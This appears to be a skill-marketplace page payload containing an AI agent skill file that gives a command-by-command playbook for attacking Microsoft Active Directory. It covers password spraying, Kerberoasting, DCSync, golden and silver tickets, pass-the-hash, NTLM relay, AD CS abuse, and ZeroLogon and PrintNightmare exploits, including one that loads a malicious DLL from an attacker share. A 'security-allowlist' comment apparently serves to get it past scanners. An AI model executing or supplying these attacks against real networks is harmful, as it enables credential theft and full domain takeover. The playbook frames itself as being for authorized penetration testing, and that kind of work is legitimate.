[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"skill-19a2ca2f-90f2-4942-b391-64a27cc1035a":3,"$fs9QLv_PLQ7q-1qH93AMfXRUqUoLHvabcn0l6hiM7Loo":43},{"id":4,"title":5,"description":6,"categoryId":7,"moduleId":8,"tags":9,"prompt":10,"icon":11,"source":12,"sourceUrl":13,"authorId":14,"authorName":15,"isPublic":16,"stars":17,"runs":18,"createdAt":19,"updatedAt":19,"module":20,"category":27,"packages":34},"19a2ca2f-90f2-4942-b391-64a27cc1035a","active-directory-attacks","提供针对Microsoft Active Directory环境的全面攻击技术。涵盖侦察、凭证收集、Kerberos攻击、横向移动、权限提升和域控制，适用于红队行动和渗透测试。","cat_writing_copywriting","mod_writing","sickn33,writing","---\nname: active-directory-attacks\ndescription: \"Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\"\nrisk: offensive\nsource: community\nauthor: zebbern\ndate_added: \"2026-02-27\"\n---\n\n> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n\u003C!-- security-allowlist: credential-extraction, kerberos-attacks -->\n\n# Active Directory Attacks\n\n## Purpose\n\nProvide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.\n\n## Inputs\u002FPrerequisites\n\n- Kali Linux or Windows attack platform\n- Domain user credentials (for most attacks)\n- Network access to Domain Controller\n- Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec\n\n## Outputs\u002FDeliverables\n\n- Domain enumeration data\n- Extracted credentials and hashes\n- Kerberos tickets for impersonation\n- Domain Administrator access\n- Persistent access mechanisms\n\n---\n\n## Essential Tools\n\n| Tool | Purpose |\n|------|---------|\n| BloodHound | AD attack path visualization |\n| Impacket | Python AD attack tools |\n| Mimikatz | Credential extraction |\n| Rubeus | Kerberos attacks |\n| CrackMapExec | Network exploitation |\n| PowerView | AD enumeration |\n| Responder | LLMNR\u002FNBT-NS poisoning |\n\n---\n\n## Core Workflow\n\n### Step 1: Kerberos Clock Sync\n\nKerberos requires clock synchronization (±5 minutes):\n\n```bash\n# Detect clock skew\nnmap -sT 10.10.10.10 -p445 --script smb2-time\n\n# Fix clock on Linux\nsudo date -s \"14 APR 2024 18:25:16\"\n\n# Fix clock on Windows\nnet time \u002Fdomain \u002Fset\n\n# Fake clock without changing system time\nfaketime -f '+8h' \u003Ccommand>\n```\n\n### Step 2: AD Reconnaissance with BloodHound\n\n```bash\n# Start BloodHound\nneo4j console\nbloodhound --no-sandbox\n\n# Collect data with SharpHound\n.\\SharpHound.exe -c All\n.\\SharpHound.exe -c All --ldapusername user --ldappassword pass\n\n# Python collector (from Linux)\nbloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all\n```\n\n### Step 3: PowerView Enumeration\n\n```powershell\n# Get domain info\nGet-NetDomain\nGet-DomainSID\nGet-NetDomainController\n\n# Enumerate users\nGet-NetUser\nGet-NetUser -SamAccountName targetuser\nGet-UserProperty -Properties pwdlastset\n\n# Enumerate groups\nGet-NetGroupMember -GroupName \"Domain Admins\"\nGet-DomainGroup -Identity \"Domain Admins\" | Select-Object -ExpandProperty Member\n\n# Find local admin access\nFind-LocalAdminAccess -Verbose\n\n# User hunting\nInvoke-UserHunter\nInvoke-UserHunter -Stealth\n```\n\n---\n\n## Credential Attacks\n\n### Password Spraying\n\n```bash\n# Using kerbrute\n.\u002Fkerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123\n\n# Using CrackMapExec\ncrackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success\n```\n\n### Kerberoasting\n\nExtract service account TGS tickets and crack offline:\n\n```bash\n# Impacket\nGetUserSPNs.py domain.local\u002Fuser:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt\n\n# Rubeus\n.\\Rubeus.exe kerberoast \u002Foutfile:hashes.txt\n\n# CrackMapExec\ncrackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt\n\n# Crack with hashcat\nhashcat -m 13100 hashes.txt rockyou.txt\n```\n\n### AS-REP Roasting\n\nTarget accounts with \"Do not require Kerberos preauthentication\":\n\n```bash\n# Impacket\nGetNPUsers.py domain.local\u002F -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat\n\n# Rubeus\n.\\Rubeus.exe asreproast \u002Fformat:hashcat \u002Foutfile:hashes.txt\n\n# Crack with hashcat\nhashcat -m 18200 hashes.txt rockyou.txt\n```\n\n### DCSync Attack\n\nExtract credentials directly from DC (requires Replicating Directory Changes rights):\n\n```bash\n# Impacket\nsecretsdump.py domain.local\u002Fadmin:password@10.10.10.10 -just-dc-user krbtgt\n\n# Mimikatz\nlsadump::dcsync \u002Fdomain:domain.local \u002Fuser:krbtgt\nlsadump::dcsync \u002Fdomain:domain.local \u002Fuser:Administrator\n```\n\n---\n\n## Kerberos Ticket Attacks\n\n### Pass-the-Ticket (Golden Ticket)\n\nForge TGT with krbtgt hash for any user:\n\n```powershell\n# Get krbtgt hash via DCSync first\n# Mimikatz - Create Golden Ticket\nkerberos::golden \u002Fuser:Administrator \u002Fdomain:domain.local \u002Fsid:S-1-5-21-xxx \u002Fkrbtgt:HASH \u002Fid:500 \u002Fptt\n\n# Impacket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator\nexport KRB5CCNAME=Administrator.ccache\npsexec.py -k -no-pass domain.local\u002FAdministrator@dc.domain.local\n```\n\n### Silver Ticket\n\nForge TGS for specific service:\n\n```powershell\n# Mimikatz\nkerberos::golden \u002Fuser:Administrator \u002Fdomain:domain.local \u002Fsid:S-1-5-21-xxx \u002Ftarget:server.domain.local \u002Fservice:cifs \u002Frc4:SERVICE_HASH \u002Fptt\n```\n\n### Pass-the-Hash\n\n```bash\n# Impacket\npsexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\nwmiexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\nsmbexec.py domain.local\u002FAdministrator@10.10.10.10 -hashes :NTHASH\n\n# CrackMapExec\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local\ncrackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth\n```\n\n### OverPass-the-Hash\n\nConvert NTLM hash to Kerberos ticket:\n\n```bash\n# Impacket\ngetTGT.py domain.local\u002Fuser -hashes :NTHASH\nexport KRB5CCNAME=user.ccache\n\n# Rubeus\n.\\Rubeus.exe asktgt \u002Fuser:user \u002Frc4:NTHASH \u002Fptt\n```\n\n---\n\n## NTLM Relay Attacks\n\n### Responder + ntlmrelayx\n\n```bash\n# Start Responder (disable SMB\u002FHTTP for relay)\nresponder -I eth0 -wrf\n\n# Start relay\nntlmrelayx.py -tf targets.txt -smb2support\n\n# LDAP relay for delegation attack\nntlmrelayx.py -t ldaps:\u002F\u002Fdc.domain.local -wh attacker-wpad --delegate-access\n```\n\n### SMB Signing Check\n\n```bash\ncrackmapexec smb 10.10.10.0\u002F24 --gen-relay-list targets.txt\n```\n\n---\n\n## Certificate Services Attacks (AD CS)\n\n### ESC1 - Misconfigured Templates\n\n```bash\n# Find vulnerable templates\ncertipy find -u user@domain.local -p password -dc-ip 10.10.10.10\n\n# Exploit ESC1\ncertipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local\n\n# Authenticate with certificate\ncertipy auth -pfx administrator.pfx -dc-ip 10.10.10.10\n```\n\n### ESC8 - Web Enrollment Relay\n\n```bash\nntlmrelayx.py -t http:\u002F\u002Fca.domain.local\u002Fcertsrv\u002Fcertfnsh.asp -smb2support --adcs --template DomainController\n```\n\n---\n\n## Critical CVEs\n\n### ZeroLogon (CVE-2020-1472)\n\n```bash\n# Check vulnerability\ncrackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon\n\n# Exploit\npython3 cve-2020-1472-exploit.py DC01 10.10.10.10\n\n# Extract hashes\nsecretsdump.py -just-dc domain.local\u002FDC01\\$@10.10.10.10 -no-pass\n\n# Restore password (important!)\npython3 restorepassword.py domain.local\u002FDC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD\n```\n\n### PrintNightmare (CVE-2021-1675)\n\n```bash\n# Check for vulnerability\nrpcdump.py @10.10.10.10 | grep 'MS-RPRN'\n\n# Exploit (requires hosting malicious DLL)\npython3 CVE-2021-1675.py domain.local\u002Fuser:pass@10.10.10.10 '\\\\attacker\\share\\evil.dll'\n```\n\n### samAccountName Spoofing (CVE-2021-42278\u002F42287)\n\n```bash\n# Automated exploitation\npython3 sam_the_admin.py \"domain.local\u002Fuser:password\" -dc-ip 10.10.10.10 -shell\n```\n\n---\n\n## Quick Reference\n\n| Attack | Tool | Command |\n|--------|------|---------|\n| Kerberoast | Impacket | `GetUserSPNs.py domain\u002Fuser:pass -request` |\n| AS-REP Roast | Impacket | `GetNPUsers.py domain\u002F -usersfile users.txt` |\n| DCSync | secretsdump | `secretsdump.py domain\u002Fadmin:pass@DC` |\n| Pass-the-Hash | psexec | `psexec.py domain\u002Fuser@target -hashes :HASH` |\n| Golden Ticket | Mimikatz | `kerberos::golden \u002Fuser:Admin \u002Fkrbtgt:HASH` |\n| Spray | kerbrute | `kerbrute passwordspray -d domain users.txt Pass` |\n\n---\n\n## Constraints\n\n**Must:**\n- Synchronize time with DC before Kerberos attacks\n- Have valid domain credentials for most attacks\n- Document all compromised accounts\n\n**Must Not:**\n- Lock out accounts with excessive password spraying\n- Modify production AD objects without approval\n- Leave Golden Tickets without documentation\n\n**Should:**\n- Run BloodHound for attack path discovery\n- Check for SMB signing before relay attacks\n- Verify patch levels for CVE exploitation\n\n---\n\n## Examples\n\n### Example 1: Domain Compromise via Kerberoasting\n\n```bash\n# 1. Find service accounts with SPNs\nGetUserSPNs.py domain.local\u002Flowpriv:password -dc-ip 10.10.10.10\n\n# 2. Request TGS tickets\nGetUserSPNs.py domain.local\u002Flowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt\n\n# 3. Crack tickets\nhashcat -m 13100 tgs.txt rockyou.txt\n\n# 4. Use cracked service account\npsexec.py domain.local\u002Fsvc_admin:CrackedPassword@10.10.10.10\n```\n\n### Example 2: NTLM Relay to LDAP\n\n```bash\n# 1. Start relay targeting LDAP\nntlmrelayx.py -t ldaps:\u002F\u002Fdc.domain.local --delegate-access\n\n# 2. Trigger authentication (e.g., via PrinterBug)\npython3 printerbug.py domain.local\u002Fuser:pass@target 10.10.10.12\n\n# 3. Use created machine account for RBCD attack\n```\n\n---\n\n## Troubleshooting\n\n| Issue | Solution |\n|-------|----------|\n| Clock skew too great | Sync time with DC or use faketime |\n| Kerberoasting returns empty | No service accounts with SPNs |\n| DCSync access denied | Need Replicating Directory Changes rights |\n| NTLM relay fails | Check SMB signing, try LDAP target |\n| BloodHound empty | Verify collector ran with correct creds |\n\n---\n\n## Additional Resources\n\nFor advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM\u002FWSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see [references\u002Fadvanced-attacks.md](references\u002Fadvanced-attacks.md).\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.\n","","imported","https:\u002F\u002Fgithub.com\u002Fsickn33\u002Fantigravity-awesome-skills","user_system_seed","SkillOPIC",true,163,2025,"2026-05-16 13:00:46",{"id":8,"name":21,"slug":22,"icon":23,"description":24,"sort":25,"createdAt":26},"写作研究","writing","mdi-pencil-outline","从学术写作到创意文案，让 AI 成为你的专属写作助手",1,"2026-05-16 12:53:40",{"id":7,"name":28,"slug":29,"icon":30,"description":31,"moduleId":8,"sort":32,"skillCount":33,"createdAt":26},"文案策划","copywriting","mdi-comment-text-outline","广告文案、品牌故事、Slogan",4,72,[35],{"id":36,"skillId":4,"version":37,"fileName":38,"fileSize":39,"filePath":40,"fileHash":41,"manifest":42,"createdAt":19},"10c202ac-6e3d-41e6-b770-acbf79df0792","1.0.0","active-directory-attacks.zip",7726,"uploads\u002Fskills\u002F19a2ca2f-90f2-4942-b391-64a27cc1035a\u002Factive-directory-attacks.zip","cb0884f4cfd9dc0736dd1d4e59ea9944f8e433ca416b2fcbf353b71d5967a3c3","[{\"path\":\"SKILL.md\",\"isDirectory\":false,\"size\":9831},{\"path\":\"references\u002Fadvanced-attacks.md\",\"isDirectory\":false,\"size\":9996}]",{"code":44,"message":45,"data":46},200,"success",{"items":47,"stats":48,"page":51},[],{"averageRating":49,"totalRatings":49,"ratingCounts":50},0,[49,49,49,49,49],{"limit":52,"offset":49,"hasMore":53,"nextOffset":52,"ratedOnly":16},15,false]